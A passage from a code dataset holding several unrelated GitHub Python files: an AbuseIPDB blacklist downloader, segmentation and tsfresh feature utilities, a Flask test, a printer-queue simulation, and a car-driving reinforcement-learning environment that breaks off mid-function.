plt.show()\n","repo_name":"Sihao/photon_scatter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"40804802774","text":"import requests\r\nimport json\r\nimport sys\r\n\r\n# Defining the api-endpoint\r\nurl = 'https://api.abuseipdb.com/api/v2/blacklist'\r\n\r\nquerystring = {\r\n 'limit':'500000'\r\n}\r\n\r\nheaders = {\r\n 'Accept': 'text/plain',\r\n 'Key': 'YOUR-ABUSEIPDB-API-KEY'\r\n}\r\n\r\nresponse = requests.request(method='GET', url=url, headers=headers, params=querystring)\r\n\r\n# Formatted output\r\nwith open('abuseipdb.txt', 'w') as f:\r\n\tprint (response.text, file=f)\r\n","repo_name":"dejan995/abuseipdb-firewalld","sub_path":"abuseipdb.py","file_name":"abuseipdb.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"39872128725","text":"from mmseg.models import EncoderDecoder\n\nfrom ...builder import ARCHITECTURES\n\n\n@ARCHITECTURES.register_module()\nclass EncoderDecoderSearch(EncoderDecoder):\n \"\"\"Encoder Decoder segmentors.\n\n EncoderDecoder typically consists of backbone, decode_head, auxiliary_head.\n Note that auxiliary_head is only used for deep supervision during training,\n which could be dumped during inference.\n \"\"\"\n\n def __init__(self,\n backbone,\n decode_head,\n neck=None,\n auxiliary_head=None,\n train_cfg=None,\n test_cfg=None,\n pretrained=None,\n init_cfg=None,\n connect_head=None):\n super().__init__(backbone, decode_head, neck, auxiliary_head,\n train_cfg, test_cfg, pretrained, init_cfg)\n\n if connect_head is not None:\n from mmseg.models import builder\n for kh, vh in connect_head.items():\n component, attr = vh.split('.')\n value = getattr(getattr(self, component), attr)\n neck[kh] = [value, value, value, value]\n neck['out_channels'] = value\n decode_head[kh] = [value, value, value, value]\n auxiliary_head[kh] = value\n self.neck = builder.build_neck(neck)\n self._init_decode_head(decode_head)\n self._init_auxiliary_head(auxiliary_head)","repo_name":"XT-1997/vitmvt","sub_path":"vitmvt/models/architectures/segmentation/encoder_decoder_search.py","file_name":"encoder_decoder_search.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"69"}
+{"seq_id":"5713822774","text":"import rich\nimport requests\nfrom pydantic import BaseModel, Field\nfrom rdflib import Graph\nfrom rdflib.namespace import RDF, SKOS\n\n\nicsm_placenames_url = \"http://icsm.surroundaustralia.com/object?uri=https%3A//linked.data.gov.au/def/placenames-categories&_profile=dd&_mediatype=application/json\"\n\n\nclass Row(BaseModel):\n uri: str\n pref_label: str = Field(alias=\"prefLabel\")\n\n\nif __name__ == \"__main__\":\n response = requests.get(icsm_placenames_url)\n response.raise_for_status()\n\n icsm_placenames = set()\n for item in response.json():\n icsm_placenames.add(item[\"prefLabel\"])\n\n graph = Graph()\n graph.parse(\"pntypes.ttl\")\n\n not_found = []\n concepts = graph.subjects(RDF.type, SKOS.Concept)\n for concept in concepts:\n label = graph.value(concept, SKOS.prefLabel)\n name = str(label).lower()\n if name not in icsm_placenames:\n not_found.append(str(label))\n\n rich.print(\"Not found:\")\n rich.print(sorted(not_found))\n","repo_name":"Spatial-Information-QLD/cam-etl","sub_path":"placenames_compare.py","file_name":"placenames_compare.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32346748690","text":"from sklearn.base import BaseEstimator, TransformerMixin\nfrom tsfresh.utilities.dataframe_functions import roll_time_series\nfrom tsfresh.feature_extraction import (\n EfficientFCParameters,\n MinimalFCParameters,\n ComprehensiveFCParameters,\n)\nfrom tsfresh import (\n extract_features,\n select_features,\n extract_relevant_features,\n)\nimport re\nimport os\nfrom datetime import datetime\nfrom joblib import dump\n\n\nclass BuildRollingWindows(BaseEstimator, TransformerMixin):\n \"\"\"\n Takes in a Pandas Dataframe, and creates a rolled version of it building multiple successive windows of data.\n Each window will contain data up to and including a final index. Shift target y ahead by one time step to honour temporal dependence.\n Wraps `tsfresh` `roll_time_series`, all arguments passed through\n \"\"\"\n\n def __init__(\n self,\n column_id,\n column_sort=None,\n column_kind=None,\n rolling_direction=1,\n max_timeshift=None,\n min_timeshift=0,\n chunksize=None,\n n_jobs=4,\n show_warnings=False,\n disable_progressbar=False,\n distributor=None,\n ):\n\n self.column_id = column_id\n self.column_sort = column_sort\n self.column_kind = column_kind\n self.rolling_direction = rolling_direction\n self.max_timeshift = max_timeshift\n self.min_timeshift = min_timeshift\n self.chunksize = chunksize\n self.n_jobs = n_jobs\n self.show_warnings = show_warnings\n self.disable_progressbar = disable_progressbar\n self.distributor = distributor\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n\n windows = roll_time_series(\n X,\n self.column_id,\n self.column_sort,\n self.column_kind,\n self.rolling_direction,\n self.max_timeshift,\n self.min_timeshift,\n self.chunksize,\n self.n_jobs,\n self.show_warnings,\n self.disable_progressbar,\n self.distributor,\n )\n\n return windows\n\n\nclass AddEma(BaseEstimator, TransformerMixin):\n \"\"\"\n Takes in a time series Pandas dataframe, adds exponential moving averages for each column in input dataframe for each amount of days..\n Exponential moving average parametrized in terms of smoothing = 2/(days + 1).\n \"\"\"\n\n def __init__(self, periods=[12, 25, 50, 100], except_cols=[\"id\"]):\n self.periods = periods\n self.except_cols = except_cols\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n\n X_out = X.copy()\n for d in self.periods:\n for c in set(X.columns).difference(set(self.except_cols)):\n X_out[f\"{c}_ema_{d}_period\"] = X[c].ewm(span=d).mean()\n\n return X_out\n\n\nclass ExtractTSFeatures(BaseEstimator, TransformerMixin):\n \"\"\"\n Quick wrapper to allow for properly aligned time series X,y to use `tsfresh` feature augmentation.\n Expects Pandas DataFrames\n ASSUMES X,y sorted from oldest to newest already!\n \"\"\"\n\n def __init__(\n self,\n column_id,\n column_sort,\n chunk_size=100,\n default_fc_parameters=MinimalFCParameters(),\n n_jobs=0,\n ):\n \"\"\"\n Parameters\n ----------\n column_id: str\n Which column to identify different groups of time series. If only one present, add a dummy column of 1's and pass the name here\n chunk_size: int\n Chunk size for distributing calculations to processes in multi processing\n default_fc_parameters: tsfresh.setting\n A dictionary setting parameters for features desired in Tsfresh feature calculator.\n Built in options include MinimalFCParameters(), EfficientFCParameters()\n \"\"\"\n self.column_id = column_id\n self.column_sort = column_sort\n self.chunk_size = chunk_size\n self.default_fc_parameters = default_fc_parameters\n self.n_jobs = n_jobs\n\n def fit(self, X, y=None):\n return self\n\n def transform(self, X, y=None):\n feats = extract_features(\n X,\n column_id=self.column_id,\n column_sort=self.column_sort,\n chunksize=self.chunk_size,\n default_fc_parameters=self.default_fc_parameters,\n n_jobs=self.n_jobs,\n )\n\n # Rename columns to allow use with LightGBM, doesn't like \"-\", \".\"\n feats = feats.rename(\n columns=lambda x: re.sub(\"[^A-Za-z0-9_]+\", \"_\", x)\n )\n\n # Grab the datetime index out of tuple multi index that tsfresh uses\n return feats.set_index(feats.index.map(lambda x: x[1]), drop=True)\n\n\nclass SelectTSFeatures(BaseEstimator, TransformerMixin):\n \"\"\"\n Quick wrapper to allow for properly aligned time series X,y to use `tsfresh` feature augmentation.\n Expects Pandas DataFrames\n ASSUMES X,y sorted from oldest to newest already and aligned on index!\n \"\"\"\n\n def __init__(self, n_jobs):\n print(\" Selecting Relevant Features.....\")\n self.n_jobs = n_jobs\n return None\n\n def fit(self, X, y):\n self.selected_features = select_features(\n X, y, n_jobs=self.n_jobs\n ).columns\n print(\n f\"{len(self.selected_features)} features found significant out of {X.shape[1]} possible.\"\n )\n return self\n\n def transform(self, X, y=None):\n return X.loc[\n :, list(set(self.selected_features).intersection(set(X.columns)))\n ]\n\n\nclass RemoveNACols(BaseEstimator, TransformerMixin):\n \"\"\"\n Transformer to remove columns with NA's in X.\n \"\"\"\n\n def __init__(self):\n return None\n\n def fit(self, X, y=None):\n self.na_cols = X.isna().any()\n return self\n\n def transform(self, X, y=None):\n return X.loc[:, ~self.na_cols]\n\n\nclass RemoveZeroCols(BaseEstimator, TransformerMixin):\n \"\"\"\n Transformer to remove columns with all 0's in X.\n \"\"\"\n\n def __init__(self):\n return None\n\n def fit(self, X, y=None):\n self.non_zero_cols = (X != 0).any(axis=0)\n return self\n\n def transform(self, X, y=None):\n return X.loc[:, self.non_zero_cols]\n\n\ndef snapshot_model(model, path):\n now = datetime.now()\n date_time = now.strftime(\"%Y_%m_%d_%H_%M_%S\")\n dump(model, os.path.join(path, f\"{date_time}.joblib\"))","repo_name":"dbandrews/beach-time-series","sub_path":"utils/tsfresh_utils.py","file_name":"tsfresh_utils.py","file_ext":"py","file_size_in_byte":6434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"38956659855","text":"from app.config import TestConfig\nfrom app import create_app\napp = create_app(TestConfig)\nimport unittest\n\n## some\n\nclass BasicTest(unittest.TestCase):\n\n\n def test_home_valid(self):\n tester = app.test_client(self)\n response = tester.get('/acceuil')\n self.assertEqual(response.status_code, 200)\n\nif __name__ == '__maim__':\n unittest.main()","repo_name":"swishswish123/PC_brevet","sub_path":"tests/test_home.py","file_name":"test_home.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"21809227896","text":"import random\nfrom pythonds.basic import Queue\n\n\nclass Printer:\n \"\"\"检查当前是否有待完成的任务。\"\"\"\n def __init__(self, ppm):\n # 其构造方法会初始化打印速度,即每分钟打印多少页。\n self.pagerate = ppm\n # 是否有待完成的任务\n self.currentTask = None\n # 工作所需的时间\n self.timeRemaining = 0\n\n def tick(self):\n \"\"\"\n tick方法会减量计时,并且在执行完任务之后将打印机设置成空闲状态\"\"\"\n if self.currentTask != None:\n # 打印机进行一秒的打印,同时从该任务的执行时间中减去一秒。\n self.timeRemaining = self.timeRemaining - 1\n # 如果打印任务执行完毕,或者说任务需要的时间减为0,则说明打印机回到空闲状态。\n if self.timeRemaining <= 0:\n self.currentTask = None\n\n def busy(self):\n \"\"\"如果有,那么打印机就处于工作状态\"\"\"\n if self.currentTask != None:\n return True\n else:\n return False\n\n def startNext(self, newtask):\n self.currentTask = newtask\n # 并且其工作所需的时间可以通过要打印的页数来计算。\n self.timeRemaining = newtask.getPages() * 60/self.pagerate\n\n\nclass Task:\n \"\"\"打印任务队列\"\"\"\n def __init__(self, time):\n # 每一个任务都需要保存一个时间戳,用于计算等待时间。\n # 这个时间戳代表任务被创建并放入打印任务队列的时间。\n self.timestamp = time\n # 当任务被创建时,随机数生成器会随机提供页数,取值范围是1~20。\n self.pages = random.randrange(1,21)\n\n def getStamp(self):\n return self.timestamp\n\n def getPages(self):\n return self.pages\n\n def waitTime(self, currenttime):\n \"\"\"waitTime方法可以获得任务在队列中等待的时间。\"\"\"\n return currenttime - self.timestamp\n\n\ndef newPrintTask():\n \"\"\"可以通过1~180的一个随机数来模拟每秒内产生打印任务的概率。\n 布尔辅助函数newPrintTask判断是否有新创建的打印任务。\n 我们再一次使用random模块中的randrange函数来生成随机数,不过这一次的取值范围是1~180。\n 平均每180秒有一个打印任务。\n 通过从随机数中选取180,可以模拟这个随机事件。\"\"\"\n num = random.randrange(1,181)\n if num == 180:\n return True\n else:\n return False\n\n\ndef simulation(numSeconds, pagesPerMinute):\n \"\"\"\n\n :param numSeconds: 总时间\n :param pagesPerMinute:打印机每分钟打印多少页\n :return:\n \"\"\"\n labprinter = Printer(pagesPerMinute)\n # printQueue对象是队列抽象数据类型的实例。\n # 创建一个打印任务队列。\n # 每一个任务到来时都会有一个时间戳。\n # 一开始,队列是空的。\n printQueue = Queue()\n # 存放任务的等待时间的一个列表\n waitingtimes = []\n # 针对每一秒(currentSecond),执行以下操作。\n for currentSecond in range(numSeconds):\n # 打印任务发生,就添加到打印任务队列\n # 是否有新创建的打印任务?\n # 如果是,以currentSecond作为其时间戳并将该任务加入到队列中。\n if newPrintTask():\n task = Task(currentSecond)\n printQueue.enqueue(task)\n # 打印机空闲,并且打印任务队列不为空\n # 如果打印机空闲,并且有正在等待执行的任务,执行以下操作:\n if (not labprinter.busy()) and (not printQueue.isEmpty()):\n # 取出打印任务\n # 从队列中取出第一个任务并提交给打印机;\n nexttask = printQueue.dequeue()\n # 计算等待时间:开始执行打印任务时间减去打印任务添加时间\n # 用currentSecond减去该任务的时间戳,以此计算其等待时间;\n # 将该任务的等待时间存入一个列表,以备后用;\n waitingtimes.append(nexttask.waitTime(currentSecond))\n # 计算打印时间\n # 根据该任务的页数,计算执行时间。\n labprinter.startNext(nexttask)\n # 打印机进行一秒的打印,同时从该任务的执行时间中减去一秒。\n labprinter.tick()\n # 当模拟完成之后,根据等待时间列表中的值计算平均等待时间。\n averageWait = sum(waitingtimes)/len(waitingtimes)\n print(\" Average Wait %6.2f secs %3d tasks remaining.\" % (averageWait, printQueue.size()))\n\n\nif __name__ == \"__main__\":\n for i in range(10):\n simulation(3600, 5)\n\n\n\n\n\n\n","repo_name":"weiguangfan/python_algorithm_application","sub_path":"python_ds/016.py","file_name":"016.py","file_ext":"py","file_size_in_byte":4752,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33066555033","text":"from gym_game.envs.world import World\n\nfrom gym_game.envs.agents import Car, RingBuilding, CircleBuilding, Painting, Pedestrian, Sensors, getEquidistantPoints, TextAgent, RectangleBuilding, CheckPointAgent\nfrom gym_game.envs.geometry import Point, Line\nfrom gym_game.envs.graphics import GraphWin\n\nimport time\nfrom tkinter import *\nimport numpy as np\nimport threading\n\nhuman_controller = False\n\ndt = 0.3 # time steps in terms of seconds. In other words, 1/dt is the FPS.\nworld_width = 120 # in meters\nworld_height = 120\ninner_building_radius = 25\nnum_lanes = 3\nlane_marker_width = 0.5\nnum_of_lane_markers = 20\nlane_width = 5\n\ncar_length = 4\ncar_width = 2\n\n\nspeed_limit = 5\nspeed_minimum = 1\n\ndef speed_state(car):\n if car.speed < speed_minimum:\n return 0\n elif car.speed > speed_limit:\n return 2\n else:\n return 1\n\ndef distance_state(car, checkpoint, init_dist):\n dist = car.distanceTo(checkpoint)\n for i in range(1, 5):\n if dist <= i*init_dist/5:\n return i\n return 1\n\ndistance_far = 5\ndistance_close = 1\n\ndef sensor_state_obstacle(sensor):\n if sensor.dist_obstacle < distance_close:\n return 0\n elif sensor.dist_obstacle > distance_far:\n return 2\n else:\n return 1\n\ndef sensor_state_painting(sensor):\n if sensor.closest_painting < distance_close:\n return 0\n elif sensor.closest_painting > distance_far:\n return 2\n else:\n return 1\n\nclass Carlo:\n def __init__(self, window_created: bool, win: GraphWin):\n\n self.window_created = window_created\n self.win = win\n self.w = World(dt, width = world_width, height = world_height, win = self.win, ppm = 6) # The world is 120 meters by 120 meters. ppm is the pixels per meter.\n\n # To create a circular road, we will add a CircleBuilding and then a RingBuilding around it\n # self.cb = CircleBuilding(Point(world_width/2, world_height/2), inner_building_radius, 'gray80')\n # self.w.add(self.cb)\n # self.rb = RingBuilding(Point(world_width/2, world_height/2), inner_building_radius + num_lanes * lane_width + (num_lanes - 1) * lane_marker_width, 1+np.sqrt((world_width/2)**2 + (world_height/2)**2), 'gray80')\n # self.w.add(self.rb)\n\n\n # Intersection map\n self.w.add(Painting(Point(71.5, 106.5), Point(97, 27), 'gray80')) # We build a sidewalk.\n self.w.add(RectangleBuilding(Point(72.5, 107.5), Point(95, 25))) # The RectangleBuilding is then on top of the sidewalk, with some margin.\n\n # Let's repeat this for 4 different RectangleBuildings.\n self.w.add(Painting(Point(8.5, 106.5), Point(17, 27), 'gray80'))\n self.w.add(RectangleBuilding(Point(7.5, 107.5), Point(15, 25)))\n\n self.w.add(Painting(Point(8.5, 41), Point(17, 82), 'gray80'))\n self.w.add(RectangleBuilding(Point(7.5, 40), Point(15, 80)))\n\n self.w.add(Painting(Point(71.5, 41), Point(97, 82), 'gray80'))\n self.w.add(RectangleBuilding(Point(72.5, 40), Point(95, 80)))\n\n # Let's also add some zebra crossings, because why not.\n self.w.add(Painting(Point(18, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(19, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(20, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(21, 81), Point(0.5, 2), 'white'))\n self.w.add(Painting(Point(22, 81), Point(0.5, 2), 'white'))\n\n # Let's also add some lane markers on the ground. This is just decorative. Because, why not.\n # for lane_no in range(num_lanes - 1):\n # self.lane_markers_radius = inner_building_radius + (lane_no + 1) * lane_width + (lane_no + 0.5) * lane_marker_width\n # self.lane_marker_height = np.sqrt(2*(self.lane_markers_radius**2)*(1-np.cos((2*np.pi)/(2*num_of_lane_markers)))) # approximate the circle with a polygon and then use cosine theorem\n # for theta in np.arange(0, 2*np.pi, 2*np.pi / num_of_lane_markers):\n # self.dx = self.lane_markers_radius * np.cos(theta)\n # self.dy = self.lane_markers_radius * np.sin(theta)\n # self.w.add(Painting(Point(world_width/2 + self.dx, world_height/2 + self.dy), Point(lane_marker_width, self.lane_marker_height), 'white', heading = theta))\n\n\n # Checkpoint\n self.checkpoint = CheckPointAgent(Point(78, 85), 3)\n self.w.add(self.checkpoint)\n\n # A Car object is a dynamic object -- it can move. We construct it using its center location and heading angle.\n self.c1 = Car(Point(20, 20), np.pi/2)\n self.c1.max_speed = 30.0 # let's say the maximum is 30 m/s (108 km/h)\n self.c1.velocity = Point(0, 3.0)\n self.w.add(self.c1)\n self.ppm = 6\n\n self.c2 = Car(Point(118, 90), np.pi, 'blue')\n self.c2.velocity = Point(3.0, 0) # We can also specify an initial velocity just like this.\n self.w.add(self.c2)\n\n # Pedestrian is almost the same as Car. It is a \"circle\" object rather than a rectangle.\n self.p1 = Pedestrian(Point(28, 81), np.pi)\n self.p1.max_speed = 10.0 # We can specify min_speed and max_speed of a Pedestrian (and of a Car). This is 10 m/s, almost Usain Bolt.\n self.w.add(self.p1)\n\n \n # Sensors initialization\n self.range_sensors = 10 # 10 meters\n self.precision = 10 # sensors' resolution\n\n self.s1 = Sensors(\n Point(self.ppm*self.c1.center.x + self.c1.size.x/2 * np.cos(self.c1.heading) * self.ppm, self.ppm * world_height - self.ppm*self.c1.center.y - self.ppm * self.c1.size.x/2 * np.sin(self.c1.heading)), \n Point(self.ppm*self.c1.center.x + self.c1.size.x/2 * np.cos(self.c1.heading) * self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading), \n (self.ppm*world_height - self.ppm*self.c1.center.y - self.ppm * self.c1.size.x/2 * np.sin(self.c1.heading)) - self.ppm * self.range_sensors * np.sin(self.c1.heading)), \n self.range_sensors,\n \"Front_Sensor\",\n self.c1,\n self.precision)\n \n\n self.s2 = Sensors( \n Point(self.c1.corners[0].x*self.ppm, self.ppm*world_height - self.c1.corners[0].y*self.ppm), \n Point(self.c1.corners[0].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading + np.pi/4), \n (self.ppm*world_height - self.ppm*self.c1.corners[0].y) - self.ppm * self.range_sensors * np.sin(self.c1.heading + np.pi/4)), \n self.range_sensors,\n \"Diag_Left_Sensor\",\n self.c1,\n self.precision)\n\n self.s3 = Sensors(\n Point(self.c1.corners[3].x*self.ppm, self.ppm*world_height - self.c1.corners[3].y*self.ppm), \n Point(self.c1.corners[3].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading - np.pi/4), \n (self.ppm*world_height - self.ppm*self.c1.corners[3].y) - self.ppm * self.range_sensors * np.sin(self.c1.heading - np.pi/4)), \n self.range_sensors,\n \"Diag_Right_Sensor\",\n self.c1,\n self.precision)\n\n self.s4 = Sensors(\n Point(self.c1.edge_centers[1][0]*self.ppm, self.ppm*world_height - self.c1.edge_centers[1][1]*self.ppm), \n Point(self.c1.edge_centers[1][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading + np.pi/2), \n (self.ppm*world_height - self.ppm*self.c1.edge_centers[1][1]) - self.ppm * self.range_sensors * np.sin(self.c1.heading + np.pi/2)), \n self.range_sensors,\n \"Mid_Left_Sensor\",\n self.c1,\n self.precision)\n\n self.s5 = Sensors(\n Point(self.c1.edge_centers[3][0]*self.ppm, self.ppm*world_height - self.c1.edge_centers[3][1]*self.ppm), \n Point(self.c1.edge_centers[3][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading - np.pi/2), \n (self.ppm*world_height - self.ppm*self.c1.edge_centers[3][1]) - self.ppm * self.range_sensors * np.sin(self.c1.heading - np.pi/2)), \n self.range_sensors,\n \"Mid_Right_Sensor\",\n self.c1,\n self.precision)\n\n # self.s3 = Sensors(\n # Point(self.c1.corners[3].x*self.ppm, self.ppm*world_height - self.c1.corners[3].y*self.ppm), \n # Point(self.c1.corners[3].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.c1.heading - np.pi/4), \n # (self.ppm*world_height - self.ppm*self.c1.corners[3].y) - self.ppm * self.range_sensors * np.sin(self.c1.heading - np.pi/4)), \n # self.range_sensors,\n # \"Mid_Right_Sensor\",\n # self.c1,\n # self.precision)\n\n self.s1.collidable = False\n self.s2.collidable = False\n self.s3.collidable = False\n self.s4.collidable = False\n self.s5.collidable = False\n\n self.w.add(self.s1)\n self.w.add(self.s2)\n self.w.add(self.s3)\n self.w.add(self.s4)\n self.w.add(self.s5)\n\n self.listSensors = [self.s1, self.s2, self.s3, self.s4, self.s5]\n\n # Add Text\n\n self.textTest = TextAgent(Point(world_width, world_height), \"Distance Front Sensor \" + str(self.s1.dist_obstacle) + \"\\n\" \n + \"Distance Diag Right Sensor \" + str(self.s3.dist_obstacle) + \"\\n\" \n + \"Distance Diag Left Sensor \" + str(self.s2.dist_obstacle) + \"\\n\"\n + \"Distance Mid Left Sensor \" + str(self.s4.dist_obstacle) + \"\\n\"\n + \"Distance Mid Right Sensor \" + str(self.s5.dist_obstacle))\n self.textTest.collidable = False\n self.w.add(self.textTest)\n\n self.init_dist_to_cp = self.c1.distanceTo(self.checkpoint)\n # self.w.render(window_created) # This visualizes the world we just constructed.\n \n\n\n # def observe(self):\n # #return state\n # return tuple([self.s1.dist_obstacle, self.s2.dist_obstacle, self.s3.dist_obstacle])\n\n # def action(self, action): # Right positive\n # if action == 0:\n # self.c1.set_control(0.5, 0)\n # elif action == 1:\n # self.c1.set_control(0, 0)\n # elif action == 2:\n # self.c1.set_control(-2, 0)\n\n # anchor = Point(world_width/5, world_height/5)\n # self.info = Text(anchor, str(self.c1.speed))\n # self.w.add(self.info)\n\n # self.w.render() # This visualizes the world we just constructed.\n\n\n def observe(self):\n #return state\n return tuple([sensor_state_obstacle(self.s1),\n sensor_state_obstacle(self.s2),\n sensor_state_obstacle(self.s3),\n sensor_state_obstacle(self.s4),\n sensor_state_obstacle(self.s5),\n sensor_state_painting(self.s1),\n sensor_state_painting(self.s2),\n sensor_state_painting(self.s3),\n sensor_state_painting(self.s4),\n sensor_state_painting(self.s5),\n speed_state(self.c1),\n distance_state(self.c1, self.checkpoint, self.init_dist_to_cp)\n ])\n\n def action(self, action):\n # if action == 0:\n # self.c1.set_control(0.3, 0)\n # elif action == 1:\n # self.c1.set_control(-0.3, 0)\n # elif action == 2:\n # self.c1.set_control(0, 1)\n # elif action == 3:\n # self.c1.set_control(0, -1)\n\n rotation = 0.15\n\n if action == 0:\n self.c1.set_control(rotation, 0.1)\n elif action == 1:\n self.c1.set_control(rotation, 1)\n elif action == 2:\n self.c1.set_control(rotation, -1)\n elif action == 3:\n self.c1.set_control(-rotation, 0.1)\n elif action == 4:\n self.c1.set_control(-rotation, 1)\n elif action == 5:\n self.c1.set_control(-rotation, -1)\n elif action == 6:\n self.c1.set_control(0, 0.1)\n elif action == 7:\n self.c1.set_control(0, 1)\n elif action == 8:\n self.c1.set_control(0, -1)\n\n\n\n self.w.tick() # This ticks the world for one time step (dt second)\n\n # Update sensors\n # First sensor\n self.s1.car = self.c1\n self.s1.p1 = Point(self.ppm*self.s1.car.center.x + self.s1.car.size.x/2 * np.cos(self.s1.car.heading) * self.ppm, self.ppm * world_height - self.ppm*self.s1.car.center.y - self.ppm * self.s1.car.size.x/2 * np.sin(self.s1.car.heading))\n self.s1.p2 = Point(self.ppm*self.s1.car.center.x + self.s1.car.size.x/2 * np.cos(self.s1.car.heading) * self.ppm + self.ppm * self.range_sensors * np.cos(self.s1.car.heading), \n (self.ppm*world_height - self.ppm*self.s1.car.center.y - self.ppm * self.s1.car.size.x/2 * np.sin(self.s1.car.heading)) - self.ppm * self.range_sensors * np.sin(self.s1.car.heading))\n self.s1.list_points = list(getEquidistantPoints(self.s1.p1, self.s1.p2, self.precision))\n\n # Second sensor\n self.s2.car = self.c1\n self.s2.p1 = Point(self.s2.car.corners[0].x*self.ppm, self.ppm*world_height - self.s2.car.corners[0].y*self.ppm)\n self.s2.p2 = Point(self.s2.car.corners[0].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.s2.car.heading + np.pi/4), \n (self.ppm*world_height - self.ppm*self.s2.car.corners[0].y) - self.ppm * self.range_sensors * np.sin(self.s2.car.heading + np.pi/4))\n self.s2.list_points = list(getEquidistantPoints(self.s2.p1, self.s2.p2, self.precision))\n # Third sensor\n self.s3.car = self.c1\n self.s3.p1 = Point(self.s3.car.corners[3].x*self.ppm, self.ppm*world_height - self.s3.car.corners[3].y*self.ppm)\n self.s3.p2 = Point(self.s3.car.corners[3].x*self.ppm + self.ppm * self.range_sensors * np.cos(self.s1.car.heading - np.pi/4), \n (self.ppm*world_height - self.ppm*self.s3.car.corners[3].y) - self.ppm * self.range_sensors * np.sin(self.s3.car.heading - np.pi/4))\n self.s3.list_points = list(getEquidistantPoints(self.s3.p1, self.s3.p2, self.precision))\n # Fourth sensor\n self.s4.car = self.c1\n self.s4.p1 = Point(self.s4.car.edge_centers[1][0]*self.ppm, self.ppm*world_height - self.s4.car.edge_centers[1][1]*self.ppm)\n self.s4.p2 = Point(self.s4.car.edge_centers[1][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.s4.car.heading + np.pi/2), \n (self.ppm*world_height - self.ppm*self.s4.car.edge_centers[1][1]) - self.ppm * self.range_sensors * np.sin(self.s4.car.heading + np.pi/2))\n self.s4.list_points = list(getEquidistantPoints(self.s4.p1, self.s4.p2, self.precision))\n # Fifth sensor\n self.s5.car = self.c1\n self.s5.p1 = Point(self.s5.car.edge_centers[3][0]*self.ppm, self.ppm*world_height - self.s5.car.edge_centers[3][1]*self.ppm)\n self.s5.p2 = Point(self.s5.car.edge_centers[3][0]*self.ppm + self.ppm * self.range_sensors * np.cos(self.s5.car.heading - np.pi/2), \n (self.ppm*world_height - self.ppm*self.s5.car.edge_centers[3][1]) - self.ppm * self.range_sensors * np.sin(self.s5.car.heading - np.pi/2))\n self.s5.list_points = list(getEquidistantPoints(self.s5.p1, self.s5.p2, self.precision))\n\n # Update all sensors' lines\n for sensor in self.listSensors:\n sensor.obj = []\n for i in range(sensor.range_sensors):\n sensor.obj.append(Line(Point(sensor.list_points[i][0], sensor.list_points[i][1]), Point(sensor.list_points[i+1][0], sensor.list_points[i+1][1])))\n\n self.s1.collidable = False\n self.s2.collidable = False\n self.s3.collidable = False\n self.s4.collidable = False\n self.s5.collidable = False\n \n # Sensors detection parallelization\n threading.Thread(target = self.sensor_detection_obstacle).start()\n threading.Thread(target = self.sensor_detection_painting).start()\n\n\n # Update Text\n\n self.textTest.text = \"Distance Front Sensor \" + str(self.s1.dist_obstacle) + \"\\n\" \\\n + \"Distance Diag Right Sensor \" + str(self.s3.dist_obstacle) + \"\\n\" \\\n + \"Distance Diag Left Sensor \" + str(self.s2.dist_obstacle) + \"\\n\" \\\n + \"Distance Mid Left Sensor \" + str(self.s4.dist_obstacle) + \"\\n\" \\\n + \"Distance Mid Right Sensor \" + str(self.s5.dist_obstacle) + \"\\n\" \\\n \"\\n Speed \" + str(round(self.c1.speed, 3))\n\n self.textTest.collidable = False \n\n self.w.render(self.window_created)\n\n # time.sleep(dt/4) # Let's watch it 4x\n\n\n\n if self.w.collision_exists(): # We can check if there is any collision at all.\n pass\n # print('Collision exists somewhere...')\n\n if self.w.car_cross_line():\n pass\n # print(\"CAR CROSSES LINE\")\n\n def sensor_detection_obstacle(self):\n\n # Sensors detection\n for sensor in self.listSensors:\n sensor.dist_obstacle = self.range_sensors\n for agent in self.w.static_agents:\n if not isinstance(agent, Painting) and not isinstance(agent, TextAgent):\n for sensor in self.listSensors:\n for mRange in range(self.range_sensors):\n if (Line( sensor.obj[mRange].p1/self.ppm, sensor.obj[mRange].p2/self.ppm).intersectsWith(agent.obj)): \n # print(sensor.name, \" detects \", agent, \"range\", mRange)\n sensor.dist_obstacle = mRange\n break\n\n def sensor_detection_painting(self):\n for sensor in self.listSensors:\n sensor.closest_painting = self.range_sensors\n for agent in self.w.static_agents:\n if isinstance(agent, Painting):\n for sensor in self.listSensors:\n for mRange in range(self.range_sensors):\n if (Line( sensor.obj[mRange].p1/self.ppm, sensor.obj[mRange].p2/self.ppm).intersectsWith(agent.obj)):\n sensor.closest_painting = mRange\n # print(sensor.name, \"detects\", agent, \"range\", mRange)\n break\n\n def evaluate(self):\n\n reward = 0\n if self.w.collision_exists(): # We can check if there is any collision at all.\n reward += -10000\n else:\n reward += 100\n if self.c1.speed < speed_minimum or self.c1.speed > speed_limit:\n reward += -1000\n if self.c1.speed > 3:\n reward += 10\n if self.w.car_cross_line(): # car crosses line\n reward -= 100\n reward += -10*distance_state(self.c1, self.checkpoint, 